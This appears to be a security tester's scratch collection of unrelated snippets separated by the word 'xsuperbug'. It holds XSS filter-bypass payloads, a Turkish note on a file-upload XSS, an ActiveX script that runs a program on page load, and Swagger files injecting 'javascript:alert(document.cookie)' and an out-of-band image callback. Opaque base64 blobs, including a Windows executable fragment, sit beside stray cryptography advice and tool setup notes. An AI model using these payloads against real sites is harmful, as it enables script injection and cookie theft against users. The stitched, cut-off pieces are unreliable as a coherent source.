xsuperbug

<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()

<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)

xsuperbug

Zafiyet Hakkında
================
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
 
Proof of concept
================
Dosya yükleme modülünde uzantı ve içerik kontrolü yapılmadığı için sisteme zararlı içerik yeklenebilmektedir.
(Not : XSS zafiyetinin çalışması için bağlantıda değişiklik yapılmıştır.)

Dosyanın bulunduğu hatalı sayfa:

xsuperbug

Encrypting data (Was: AES-CTR with HMAC): Use, in order of preference: (1) The Nacl/libsodium default, (2) Chacha20-Poly1305, or (3) AES-GCM.

You care about this if: you're hiding information from users or the network.

All three options get you "AEAD", which is the only way you want to encrypt in 2015. Options (2) and (3) are morally the same thing: a stream cipher with a polynomial ("thermonuclear CRC") MAC. Option (2) gets there with a native stream cipher and a MAC optimized for general purpose CPUs; Poly1305 is also easier than GCM for library designers to implement safely. Option (3)'s AES-GCM is the industry standard; it's fast and usually hardware accelerated on modern processors, but has implementation safety pitfalls on platforms that aren't accelerated.

Avoid: AES-CBC, AES-CTR by itself, block ciphers with 64-bit blocks --- most especially Blowfish, which is inexplicably popular, OFB mode. Don't ever use RC4, which is comically broken.

Symmetric key length (Was: Use 256 bit keys

xsuperbug

<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">

[1]
Bytes: 
\x09 \x0a \x0c \x0d \x20 \x2f

<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">

[2,3]

xsuperbug

<script language="javascript" type="text/javascript">
function OpenFile(){
alert ('Work');
var x = new ActiveXObject("WScript.Shell");
x.run('calc.exe');
}
</script>
</head>
<body onload="OpenFile()">

xsuperbug

# Load Rebex ECC DLL for net20
# Source: http://labs.rebex.net/curves
$EncodedCompressedFile = @'
7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivvipP+nX+LV/jV/j1/h16P//9//9a/waf9evIc/vqT83PX8Q/f83+V3+nt/k1/jbfuyf/13/rl/z+T//u76ZF026qquLOluk02y5rNp0kqf1epkWy/Tpl6/TRTXLx7/xb5z8bgrj5emv8Ws8/zV/7V/j8uKnf28D9z/6NX6t3/U3/DV/g1/j1/iT6P+/nny2/Bvp95R++YfoJ7DD77+W4I3H/Pw1fo0f48/x/Nq/xu/5h/8av8Zvxv9zP+0Pfn47gvsavxDcrV/bfOo9/9Fv8Gv8RvTjr/obfoNf43eKfD34pL/Gr/EbeH/+BvT3t72/x23+rqWf7Z/4G8hYMFbF2zz08R8wrpt6Sr8zbhg7Bvqn/AZBu9+T/jeu87KihsAVODOsP6PX7knwAT0vQddfQ3D7tX6NX/fX+Kf+tl/n1/iPftWv/Wv8mt2Gt3we/Vpbv9mv8Wskv9av/UsIwq/zrV/wa/1i/vlr/JY7v9av8VvR9/TXb/5rr2kwv1by623/Wr/Nt36tX2+LRvTrfetIGv7a/O//9Wt+67fc+TV/jd/01+Bh/ObyVfJb/BpbvzmB/tZ/8Gv9Olv0wa/3a2//hjX9XDW/BX36g1+X/vqt7V+/1q+9RW//er+EOvp1fq1f95f8OozDr004nCiegzA+GYCBYf16DIjg/bo6tl9bf/46+pM/57H+Dr8G+I/G+mvd+7V+22/92uvf4td0I65+SwzjUl77tflf/mj0G1CXTI3f5lsv5NvqtwIxtwjur5d964+RDka/sfz8tZs/9teltgqm+W

xsuperbug

###
If you use kali or any distro over SSH (like Droplet or VM with no GUI), You might have noticed aquatone does require xorg. 
This few lines will help you create a report of domains with response headers and screenshots using gowitness.

Gowitness : https://github.com/sensepost/gowitness
Aquatone : https://github.com/michenriksen/aquatone

> Setup Kali Linux Hyper-V  OR Ubuntu droplet
> Set VM/Droplet to Apache on boot. (Also SSH if it's VM) 
> Set VM to start on host boot

xsuperbug

swagger: "2.0",
info: 
  title: "Swagger Sample App",
  description: "Please to click Terms of service"
  termsOfService: "javascript:alert(document.cookie)"
  contact: 
    name: "API Support",
    url: "javascript:alert(document.cookie)",
    email: "javascript:alert(document.cookie)"
  version: "1.0.1"

xsuperbug

swagger: '2.0'
info:
  version: "0.0.1"
  title: Example Title
  description: <img src="https://828fh2yinnngr821bgxe95574yapye.burpcollaborator.net">
paths:
  /:
    get:
      responses:
        200:

xsuperbug

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALVJqloAAAAAAAAAAOAAIgALATAAAA4AAAAIAAAAAAAAiiwAAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAADgsAABPAAAAAEAAAPQFAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAkAwAAAAgAAAADgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAPQFAAAAQAAAAAYAAAAQAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAFgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABsLAAAAAAAAEgAAAACAAUAcCEAAMgKAAABAAAAAQAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABswAwADAQAAAQAAESgPAAAKcgEAAHAoEAAACm8RAAAKKA8AAApyAQAAcCgQAAAKbxIAAAoCLFwCjixYAigBAAArEgAoFAAACixJBhYvFXINAABwKBUAAAoGKBYAAAo4gAAAAHKBAABwBmwoFwAACgsSASgYAAAKjBkAAAFy4QAAcCgZAAAKKBUAAAoGKBYAAAorUHL5AABwKBUAAAooGgAACigVAAAKcm8BAHAoFQAA